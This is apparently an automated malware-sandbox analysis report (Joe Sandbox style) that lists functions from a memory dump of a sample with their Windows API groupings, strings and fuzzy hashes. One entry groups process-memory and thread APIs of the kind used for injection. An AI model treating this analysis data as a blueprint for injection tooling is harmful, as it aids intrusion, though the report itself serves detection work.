                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID: !$asin
                                                                          • API String ID: 1156100317-2188059690
                                                                          • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                          • Instruction ID: 0a049dbe2d512094c4cf38911ffd0b8d540bed8231929d6aed29f5b784f9f150
                                                                          • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                          • Instruction Fuzzy Hash: 7E618022D2DF8189E6179B745811376D668EFA63D0FD28332E95A25A75EF2CE0838610
                                                                          Function 00007FF7ADC6EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                          • Instruction ID: 91195f6f2214804e071bf342563ee88af3067143a7e5b29fa99a5efdea7b7a9c
                                                                          • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                          • Instruction Fuzzy Hash: 0B51E13661D6819AD760EB92E4809AEF760F7C8B84F825132FE4D43B59EE7CD506CB10
                                                                          Function 00007FF7ADC7A6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem
                                                                          • String ID: P
                                                                          • API String ID: 135850232-3110715001
                                                                          • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                          • Instruction ID: ee3099f109997bc044d9dff099260866d49c300e2b5b57f747f09a41dddd0c90
                                                                          • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                          • Instruction Fuzzy Hash: 1741C622A0968189E751EB15C4443ADA7A0EB84FA4FD78231DA6D477E1EF38D643CB20
                                                                          Function 00007FF7ADC3EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                          • String ID: U
                                                                          • API String ID: 2456169464-4171548499
                                                                          • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                          • Instruction ID: 8973e72dafbb11eead220f0dffc426d9e40b225ee49d7e95911fcf369d625b28
                                                                          • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                          • Instruction Fuzzy Hash: 6241D622B1E6418AD7219F15E4443AAF765FB88794FC14131EE4E87798EF7CD402C750
                                                                          Function 00007FF7ADCAAB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateObjectStock
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2671490118-1439706946
                                                                          • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                          • Instruction ID: 18d7f58ec065f713d11a8f919b441836f577f7359377dd648b5a88d000337681
                                                                          • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                          • Instruction Fuzzy Hash: 1E417F326096C18BE770DF15E444B9AB7A1F788794F914225EA9943AA8DF3DD4868F00
                                                                          Function 00007FF7ADCAA1F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                          • String ID: Listbox
                                                                          • API String ID: 3747482310-2633736733
                                                                          • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                          • Instruction ID: 740a1630f4a43f25456050c970695a27d14284abc2e7f2cf5506a7f88ff5e40f
                                                                          • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                          • Instruction Fuzzy Hash: 24317E366197C18AD770DF15B444B5AB7A1F7887A0F904625EAA903BA8DB3DD482CF10
                                                                          Function 00007FF7ADC84DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume
                                                                          • String ID: %lu
                                                                          • API String ID: 2507767853-685833217
                                                                          • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                          • Instruction ID: d20a3cca32a6c5207673b86a2d8f0e258a0a7c51665ae4145b366cf90ea1ed1c
                                                                          • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                          • Instruction Fuzzy Hash: F231617260DB8689DB10EB16E48016DB761FB89BC0FD14035EA8D43B65EF7CD556C710
                                                                          Function 00007FF7ADCAB104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 1025951953-1010561917
                                                                          • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                          • Instruction ID: 35daf0aa0c8bf695d3a33bd1c070f7e5f2dd0849ab4725818036acf72c837e2d
                                                                          • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                          • Instruction Fuzzy Hash: 55312A326197818BE760DF15E544B5AB7A1FB88B90F914235EB9803B64DF3CD846CF14
                                                                          Function 00007FF7ADC6F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                          • String ID: %s%d
                                                                          • API String ID: 2330185562-1110647743
                                                                          • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                          • Instruction ID: dd1527aaf94c8ae8077b636146a8f3b3c5955f81abf91e57075f5c2570757989
                                                                          • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                          • Instruction Fuzzy Hash: 4C21BF21A0EB8299EA14FB22E4402FAA321EB49BC0FC15031DE9D03775EE2CE106C721
                                                                          Function 00007FF7ADC28782 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                          • String ID: csm
                                                                          • API String ID: 2280078643-1018135373
                                                                          • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                          • Instruction ID: 30b204f910fa981d2384929e048c1905d750a43aaba4745c4217fce661c891cd
                                                                          • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                          • Instruction Fuzzy Hash: DF212176A096418AD630FF11E44026EB761FB85BA5F810225DF9D037A5EF3CE947CB20
                                                                          Function 00007FF7ADC7C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                                          • String ID: 0
                                                                          • API String ID: 33631002-4108050209
                                                                          • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                          • Instruction ID: 028b24f72e883a3b6328f59b378cbc9a7d4b0ec3c660ee4bbaa4582322162e12
                                                                          • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                          • Instruction Fuzzy Hash: 83218332619B80CAD3609F21E48469AB7B4F784794F954236EB9D03B94DF3CD656CF10
                                                                          Function 00007FF7ADC9AF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC62DD1), ref: 00007FF7ADC9AF37
                                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ADC62DD1), ref: 00007FF7ADC9AF4F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          • API String ID: 2574300362-1816364905
                                                                          • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                          • Instruction ID: 092ced99cfb1b7d2ab3f342201debcc65e8ea17c0f5a67c129390d027cce71a7
                                                                          • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                          • Instruction Fuzzy Hash: 6CF0F861A1AB018AEF08EB10E854374B3A4EB08B09FC50835D91C46374FF7CD55AC320
                                                                          Function 00007FF7ADC06D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-1355242751
                                                                          • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                          • Instruction ID: 9aec8d7ac409ab67fa95c1082abba819a5547ebf60b93a4276fadaf9c9245144
                                                                          • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                          • Instruction Fuzzy Hash: 05E0ED2591BB0686EF15AF10E8143A463E0FB08B48FC50434C91D45374FF7CD596C350
                                                                          Function 00007FF7ADCA10C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                          • Instruction ID: 9a5fca33b39fdce095aa221945c7ef59a8167ed0c58913f31849da0e48d6c52e
                                                                          • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                          • Instruction Fuzzy Hash: 91E0ED25A1FB0689EF15AB10E82436863E5EB08B55FC50835C95D46370FF7DD596C350
                                                                          Function 00007FF7ADC97634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                          • API String ID: 2574300362-199464113
                                                                          • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                          • Instruction ID: db6ec9a83f241600433656ac6a30cdbef2c1c7e3ce7d19628a385dff20efc310
                                                                          • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                          • Instruction Fuzzy Hash: 04E0ED2191BB0685EF15EB54E81436863E1FB08B48FC50835D91D453A4FF7CE59AC310
                                                                          Function 00007FF7ADC979D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                          • Instruction ID: 615d7002207d1234dca6458f197ad90e5bf19627f4edc91656c4ccf75a3dee5f
                                                                          • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                          • Instruction Fuzzy Hash: 4BD13A66B0AB419EEB10EBA5D4801ECB771FB44788BC14436DE0D57BA9EF38D51AC390
                                                                          Function 00007FF7ADC7BAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2267087916-0
                                                                          • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
